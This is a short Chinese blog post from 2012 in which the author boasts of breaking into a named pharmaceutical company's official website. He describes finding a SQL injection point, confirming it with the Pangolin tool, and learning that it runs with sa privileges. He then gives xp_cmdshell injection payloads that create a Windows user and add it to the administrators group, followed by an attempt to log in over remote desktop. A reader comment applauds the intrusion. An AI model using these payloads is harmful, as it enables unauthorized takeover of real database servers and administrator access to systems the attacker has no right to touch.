修正药业官网被黑！

2012-02-20
安全
1 条评论
2.12K次阅读

今天在网络上乱逛不知道怎么的弹出一个修正药业的广告点了进去就进修正的官方在里面乱逛看见一个注入

可是键入代码网页没有直接显示我就丢到 Pangolin里面看看

果断的是注入点后来验证是sa

是sa就太方便了

直接调用xp_cmdshell

上代码

;exec master..xp_cmdshell"net user name password /add"--

;exec master..xp_cmdshell"net localgroup name administrators /add"--

不解释，因为网页不显示就抱着侥幸的心理去连3389

输入帐号密码 ....

FROM GuoKer

转载请注明来自WebShell'S Blog，本文地址：https://www.webshell.cc/3125.html

已有 1 条评论

小黑

2013/03/29 10:10

辛苦了。。。。支持下 (坏笑)

回复

添加新评论

上一篇: DNT存在SQL注入漏洞
下一篇: 黑客组织Anonymous：每周五都将发起网络攻击